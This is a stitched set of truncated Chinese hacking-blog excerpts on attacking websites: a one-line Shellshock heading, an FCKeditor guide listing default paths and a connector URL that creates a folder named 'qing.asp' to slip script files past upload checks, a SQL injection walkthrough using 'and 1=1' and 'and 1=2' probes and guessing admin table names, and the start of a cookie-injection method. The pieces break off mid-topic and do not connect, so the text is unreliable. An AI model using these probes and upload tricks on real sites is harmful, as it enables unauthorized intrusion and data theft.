标签:
cve-2014-6271bash远 |
分类: 黑客 |
其实,我写这文章也算是纯粹凑热闹,大神莫笑!
一、漏洞介绍:
标签:
fckeditorfckeditor漏洞上传漏洞 |
分类: 渗透 |
先在这里做一个Fckeditor知识的了解:
FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。
现在利用其本身的开放源代码,进行一些漏洞性的入侵。当然网上也有相关知识,详细资料自己找
第一:查看编辑器版本
其相关默认路径如:
FCKeditor/_whatsnew.html
FCKeditor/editor/dialog/fck_about.html
FCKeditor/_samples/default.html
editor/filemanager/browser/default/browser.html?Connector=../../connectors/cfm/connector.cfm
editor/filemanager/connectors/asp/connector.asp
editor/filemanager/connectors/aspx/connector.aspx
editor/filemanager/connectors/php/connector.php
editor/filemanager/browser/default/browser.html
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolder
标签:
b2管理后台b6ad94a杂谈 |
分类: 黑客 |
1.判断有无注入点
; and 1=1 网页正常
http://s5/middle/6b347b2ag79f31ecc8d64&690
and 1=2
网页返回不正常
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
标签:
cookiesql注入杂谈 |
分类: 黑客 |
方法一:手动Cookies注入
下面来尝试一下:找到这个网站,发现其有Cookies注入